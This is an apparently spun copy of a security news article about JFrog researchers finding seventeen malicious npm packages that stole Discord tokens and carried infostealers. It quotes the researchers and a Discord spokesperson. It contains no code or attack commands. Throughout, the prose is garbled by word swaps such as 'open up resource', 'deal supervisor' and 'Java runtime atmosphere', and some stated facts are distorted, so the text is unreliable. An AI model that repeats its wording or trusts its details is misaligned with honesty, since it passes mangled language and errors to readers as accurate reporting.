Seventeen malicious packages focusing on Discord end users have been uncovered in the open up resource Node.js deal supervisor repository, according to new exploration by DevOps automation vendor JFrog.
In a blog write-up revealed Wednesday, JFrog protection researchers Andrey Polkovnychenko and Shachar Menashe detailed how the malicious NPM packages took aim at the popular communications platform with malware and infostealers, which include Discord token grabbers thieving a user’s token would give a threat actor comprehensive handle in excess of a user’s account.
JFrog hypothesized in its blog write-up that threat actors could use Discord tokens — and by extension, the hooked up account — for botnets, spreading malware and to resell stolen accounts if the end users have Discord’s high quality Nitro support.
Menashe instructed SearchSecurity the packages were being uncovered through regimen scanning of the NPM repository.
“We are continually working our malicious code scanners on popular package repositories, which include npm,” Menashe explained in an electronic mail. “The malicious packages were being tagged by our scanners, and we later verified manually that these are in truth malicious packages and did a entire assessment of the impact. You can see that we have also disclosed quite a few packages which usually are not linked to Discord (prerequests-xcode, ‘wafer-*’ packages, and more).”
Cybercriminals focusing on the popular interaction platform is not a new phenomenon. A report from Cisco before this calendar year explained the two token thieving and malware shipping and delivery via file attachments. Sophos, in the same way, unveiled exploration in July about how threat actors are focusing on Discord end users with malware.
The malicious packages referenced in JFrog’s blog were being learned in the NPM repository. Node.js is an open up resource Java runtime atmosphere applied by a number of key enterprises, which include Discord.
Polkovnychenko and Menashe warned that threat actors’ use of open up resource repositories for malware internet hosting is an ongoing development.
“We are witnessing a recent barrage of malicious software hosted and delivered via open up-resource software repositories,” the blog examine. “Public repositories have develop into a handy instrument for malware distribution: the repository’s server is a reliable source, and interaction with it does not elevate the suspicion of any antivirus or firewall. In addition, the simplicity of installation via automation equipment these types of as the npm consumer, provides a ripe assault vector.”
A different illustration can be uncovered in JFrog exploration previous thirty day period, the place they uncovered Python malware imitating signed Python Package deal Index (PyPI) website traffic. Even more, Menashe pointed out that GitHub determined previous thirty day period to call for two-factor authentication on accounts making use of popular npm packages.
A Discord spokesperson shared the adhering to assertion with SearchSecurity.
“System protection is a precedence for us,” the spokesperson explained. “Discord relies on a blend of proactive scanning — these types of as antivirus scanning — and reactive reports to detect malware and viruses on our support before they access end users. We also do proactive work to track down and take out communities misusing Discord for this objective. At the time we develop into conscious of these conditions or undesirable actors, we take out the content material and get proper action on any participants.”
Alexander Culafi is a author, journalist and podcaster primarily based in Boston.